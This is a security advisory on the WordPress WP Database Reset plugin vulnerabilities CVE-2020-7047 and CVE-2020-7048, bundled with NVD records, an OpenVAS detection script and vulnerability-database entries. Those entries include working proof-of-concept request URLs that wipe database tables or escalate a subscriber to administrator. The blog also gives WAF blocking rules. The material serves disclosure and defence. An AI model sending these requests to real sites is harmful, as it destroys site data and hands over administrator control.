ID QUALYSBLOG:DE6A7709B03C1E0B715EE99CE4EB71AC Type qualysblog Reporter Sheela Sarva Modified 2020-01-24T16:00:16
Description
A vulnerability recently disclosed by Wordfence and published as CVE-2020-7047 and CVE-2020-7048 allows an attacker to take over vulnerable WordPress-based websites.
Functionality in the WP Database Reset plugin introduced the vulnerability, which allows any unauthenticated user to reset any table in the database to its initial state when it was installed, deleting all the content in the database.
It is also possible for an attacker to completely take over the target application. Given that all the data can be deleted from the database, an attacker can delete the designated WordPress admin and take over the role and become administrator of the website.
The vulnerability affects the WordPress Database Reset plugin versions prior to 3.15.
About the WordPress Database Reset Plugin
WordPress is a popular content management system (CMS). It is designed to emphasize accessibility, performance, security, and ease of use. The WordPress plugin, WP Database Reset, is used to reset databases used by WordPress installations. The plugin gives users the option of not having to go through the WordPress installation in order to reset the database.
Detecting the Vulnerability with Qualys WAS
Qualys has published QID 150274 for Qualys Web Application Scanning (WAS) that implements a passive detection of vulnerabilities present in the affected WordPress plugin.
If you're unable to upgrade the plugin and are a Qualys Web Application Firewall (WAF) customer, you can create custom rules to detect and block attacks that try to exploit this vulnerability.
Specifically, set these two conditions:
request.path MATCH "^.*admin.*$"
request.query-string MATCH "^.*db-reset-tables.*$"
And then set Actions to "Block & Log", and attach the rule to the vulnerable app.
{"id": "QUALYSBLOG:DE6A7709B03C1E0B715EE99CE4EB71AC", "type": "qualysblog", "bulletinFamily": "blog", "title": "WordPress Database Reset Plugin Vulnerability (CVE-2020-7047, CVE-2020-7048)", "description": "A vulnerability [recently disclosed by Wordfence](<https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/>) and published as CVE-2020-7047 and CVE-2020-7048 allows an attacker to take over vulnerable WordPress-based websites.\n\nFunctionality in the WP Database Reset plugin introduced the vulnerability, which allows any unauthenticated user to reset any table in the database to its initial state when it was installed, deleting all the content in the database.\n\nDetails about the vulnerability can be found at [CVE-2020-7047](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7047>) and [CVE-2020-7048](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7048>).\n\nIt is also possible for an attacker to completely take over the target application. Given that all the data can be deleted from the database, an attacker can delete the designated WordPress admin and take over the role and become administrator of the website.\n\nThe vulnerability affects the WordPress Database Reset plugin versions prior to 3.15.\n\n### About the WordPress Database Reset Plugin\n\n[WordPress](<https://wordpress.org/>) is a popular content management system (CMS). It is designed to emphasize accessibility, performance, security, and ease of use. The WordPress plugin, [WP Database Reset](<https://wordpress.org/plugins/wordpress-database-reset/>), is used to reset databases used by WordPress installations. The plugin gives users the option of not having to go through the WordPress installation in order to reset the database.\n\n### Detecting the Vulnerability with Qualys WAS\n\nQualys has published QID 150274 for [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that implements a passive detection of vulnerabilities present in the affected WordPress plugin.\n\n_QID 150274 : WordPress Database Reset Plugin Vulnerability_\n\n[](<https://blog.qualys.com/wp-content/uploads/2020/01/blog-wordpress-image2020-1-21_15-49-56.png>)\n\n### Remediation\n\nTo remediate the vulnerabilities, upgrade to latest version of the [WP Database Reset plugin](<https://wordpress.org/plugins/wordpress-database-reset/>).\n\n### Protection with Qualys WAF\n\nIf you're unable to upgrade the plugin and are a [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) (WAF) customer, you can create custom rules to detect and block attacks that try to exploit this vulnerability.\n\nSpecifically, set these two conditions:\n \n \n request.path MATCH \"^.*admin.*$\"\n request.query-string MATCH \"^.*db-reset-tables.*$\"\n\nAnd then set Actions to \"Block & Log\", and attach the rule to the vulnerable app.\n\n[](<https://blog.qualys.com/wp-content/uploads/2020/01/thumbnail_Outlook-1kbv3uze.png>)\n\nFor more information, refer to Custom Rules in the [Qualys WAF Getting Started Guide](<https://www.qualys.com/docs/qualys-waf-getting-started-guide.pdf>).", "published": "2020-01-24T16:00:16", "modified": "2020-01-24T16:00:16", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://blog.qualys.com/webappsec/2020/01/24/wordpress-database-reset-plugin-vulnerability-cve-2020-7047-cve-2020-7048", "reporter": "Sheela Sarva", "references": [], "cvelist": ["CVE-2020-7047", "CVE-2020-7048"], "lastseen": "2020-01-30T23:28:02", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-7048", "CVE-2020-7047"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113630"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10028", "WPVDB-ID:10027"]}, {"type": "wpexploit", "idList": ["WPEX-ID:10027", "WPEX-ID:10028"]}], "modified": "2020-01-30T23:28:02", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2020-01-30T23:28:02", "rev": 2}, "vulnersScore": 5.3}}
{"cve": [{"lastseen": "2020-12-09T22:03:17", "description": "The WordPress plugin, WP Database Reset through 3.1, contains a flaw that gave any authenticated user, with minimal permissions, the ability (with a simple wp-admin/admin.php?db-reset-tables[]=users request) to escalate their privileges to administrator while dropping all other users from the table.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T21:15:00", "title": "CVE-2020-7047", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7047"], "modified": "2020-01-24T20:45:00", "cpe": ["cpe:/a:webfactoryltd:wp_database_reset:3.1"], "id": "CVE-2020-7047", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7047", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webfactoryltd:wp_database_reset:3.1:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2020-12-09T22:03:17", "description": "The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-01-16T21:15:00", "title": "CVE-2020-7048", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7048"], "modified": "2020-01-28T18:13:00", "cpe": ["cpe:/a:webfactoryltd:wp_database_reset:3.1"], "id": "CVE-2020-7048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7048", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webfactoryltd:wp_database_reset:3.1:*:*:*:*:wordpress:*:*"]}], "openvas": [{"lastseen": "2020-02-12T14:48:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-7048", "CVE-2020-7047"], "description": "The WordPress Plugin WP Database Reset is prone to multiple vulnerabilities.", "modified": "2020-02-07T00:00:00", "published": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310113630", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113630", "type": "openvas", "title": "WordPress Database Reset Plugin <= 3.1 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113630\");\n script_version(\"2020-02-07T08:57:05+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-07 08:57:05 +0000 (Fri, 07 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-24 09:27:36 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-7047\", \"CVE-2020-7048\");\n\n script_name(\"WordPress Database Reset Plugin <= 3.1 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_wordpress_plugin_http_detect.nasl\");\n script_mandatory_keys(\"wordpress-database-reset/detected\");\n\n script_tag(name:\"summary\", value:\"The WordPress Plugin WP Database Reset is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Any authenticated user with minimal permissions can escalate their privileges\n to administrator while dropping all other users from the table with a\n wp-admin/admin.php?db-reset-tables[]=users request.\n\n - Any unauthenticated user can reset any table in the database to the initial\n WordPress set-up state (deleting all site content stored in that table) via\n the wp-admin/admin-post.php?db-reset-tables[]=comments URI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to wipe all of the site's data\n or even gain complete control over the target system.\");\n\n script_tag(name:\"affected\", value:\"WordPress Database Reset plugin through version 3.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.15.\");\n\n script_xref(name:\"URL\", value:\"https://wordpress.org/plugins/wordpress-database-reset/#developers\");\n script_xref(name:\"URL\", value:\"https://wpvulndb.com/vulnerabilities/10027\");\n script_xref(name:\"URL\", value:\"https://wpvulndb.com/vulnerabilities/10028\");\n script_xref(name:\"URL\", value:\"https://www.wordfence.com/blog/2020/01/easily-exploitable-vulnerabilities-patched-in-wp-database-reset-plugin/\");\n\n exit(0);\n}\n\n\nCPE = \"cpe:/a:webfactoryltd:wordpress-database-reset\";\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"3.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.15\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2020-12-09T21:00:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7047"], "description": "This flaw \"allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.\"\n", "modified": "2020-09-22T08:25:32", "published": "2020-01-16T00:00:00", "id": "WPEX-ID:10028", "href": "", "type": "wpexploit", "title": "WP Database Reset < 3.15 - Privilege Escalation", "sourceData": "Login as a subscriber then send the following request:\r\n\r\nURL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-09T21:03:11", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7048"], "description": "This flaw \"allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.\"\n", "modified": "2020-09-22T08:25:31", "published": "2020-01-16T00:00:00", "id": "WPEX-ID:10027", "href": "", "type": "wpexploit", "title": "WP Database Reset < 3.15 - Unauthenticated Database Reset", "sourceData": "URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111\r\n\r\nWhere you can set db-reset-tables%5B%5D to any database table you want to delete.", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2020-12-09T21:00:35", "bulletinFamily": "software", "cvelist": ["CVE-2020-7047"], "description": "This flaw \"allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.\"\n\n### PoC\n\nLogin as a subscriber then send the following request: URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code;=11111&db-reset-code-confirm;=11111\n", "modified": "2020-09-22T08:25:32", "published": "2020-01-16T00:00:00", "id": "WPVDB-ID:10028", "href": "https://wpvulndb.com/vulnerabilities/10028", "type": "wpvulndb", "title": "WP Database Reset < 3.15 - Privilege Escalation", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-09T21:03:11", "bulletinFamily": "software", "cvelist": ["CVE-2020-7048"], "description": "This flaw \"allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.\"\n\n### PoC\n\nURL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code;=11111&db-reset-code-confirm;=11111 Where you can set db-reset-tables%5B%5D to any database table you want to delete.\n", "modified": "2020-09-22T08:25:31", "published": "2020-01-16T00:00:00", "id": "WPVDB-ID:10027", "href": "https://wpvulndb.com/vulnerabilities/10027", "type": "wpvulndb", "title": "WP Database Reset < 3.15 - Unauthenticated Database Reset", "sourceData": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}
